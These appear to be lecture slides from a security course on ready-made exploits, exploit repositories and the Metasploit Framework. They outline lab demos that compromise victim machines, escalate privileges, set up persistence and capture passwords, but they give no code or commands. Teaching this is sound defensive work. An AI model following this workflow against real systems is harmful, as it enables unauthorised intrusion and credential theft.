“Canned” Exploits
• For many known vulnerabilities attackers
do not have to write their own exploit code
• Many repositories (good and bad) for
vulnerability information, exploits,
shellcode:
– www.securityfocus.com
– milw0rm.com
– www.metasploit.com
Canned Exploit Code Demo 1
• Example: a (local) kernel exploit
– http://www.securityfocus.com/bid/9138/
• Let’s:
– Download the exploit code referenced on
securityfocus
– Compile it on the victim’s machine (.204)
– Run it (as guest) on the victim’s machine
Canned Exploit Code Demo 2
• Example: a (remote) exploit
– http://www.securityfocus.com/bid/8205
• Let’s:
– Compile exploit on the victim’s machine (.204)
– Attack another machine (.202)
The Metasploit Framework
• An exploit development, testing, and deployment
tool
• URL: http://www.metasploit.com/
– Free (community edition)
• Decouples the two parts of an exploit:
– Attack vector
– Payload
Metasploit – Attack Vectors
• Many from which to choose:
– Operating systems
• Windows, Linux, Mac, Unix, Cisco, etc.
– Services
• Web, database, e-mail, FTP, etc.
• Extensible and configurable
Metasploit - Payloads
• Can be used to generate shellcode
– Framework comes with many useful payloads
• Spawn shell
• Run command
• Add privileged user
– Configurable
– Extensible
Metasploit Demo 1
• Example: the vulnerability that the
MSBlaster worm exploited
– http://www.securityfocus.com/bid/8205
• Let’s use Metasploit to:
– Choose the attack vector
– Choose the payload
– Run the exploit
– Interact with the compromised host
Metasploit Demo 2
• Example: a web browser vulnerability
• Let’s use Metasploit to:
–
–
–
–
Choose the attack vector
Choose the payload
Run the exploit
Interact with the compromised host
• Elevate privileges
• Setup persistence
• Capture passwords
Summary
• For many known vulnerabilities attackers
do not have to write their own exploit code
– “Canned” exploits
– The Metasploit Framework
• Choose and configure an attack vector
• Choose and configure a payload
• Interact with host